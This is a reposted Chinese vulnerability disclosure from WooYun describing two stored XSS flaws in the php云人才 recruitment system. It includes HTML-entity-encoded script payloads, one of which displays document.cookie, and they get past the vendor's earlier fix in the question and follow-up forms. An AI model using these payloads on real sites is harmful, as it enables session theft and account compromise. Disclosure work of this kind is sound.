php云人才系统存储型跨站两处

没穿底裤
没穿底裤
没穿底裤
714
文章
0
评论
2020年1月1日05:06:48评论350 views字数 774阅读2分34秒阅读模式
摘要

WooYun-2014-73319( WooYun: php云人才系统存储型跨站多处 )曾经报道过这两处存储型跨站,虽然厂商修了,但是还是可以以奇葩的方式XSS跨站。

漏洞作者: 龟兔赛跑

WooYun-2014-73319( WooYun: php云人才系统存储型跨站多处 )曾经报道过这两处存储型跨站,虽然厂商修了,但是还是可以以奇葩的方式XSS跨站。

0x01: 我要提问

================================================================

我们先将要注入的代码做HTML编码,例如:

<script>alert(1);</script>

 

编码后为:

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

 

然后贴到内容里面:

php云人才系统存储型跨站两处

添加

php云人才系统存储型跨站两处

添加成功后就可以看到弹框:

php云人才系统存储型跨站两处

0x02: 追加问题

================================================================

同样,先将要注入的代码做HTML编码,例如:

<script>alert(document.cookie);</script>

 

编码后的内容为:

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

然后贴到内容里面:

php云人才系统存储型跨站两处

回答提交后,即可弹框:

php云人才系统存储型跨站两处

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:06:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   php云人才系统存储型跨站两处http://cn-sec.com/archives/76170.html

发表评论

匿名网友 填写信息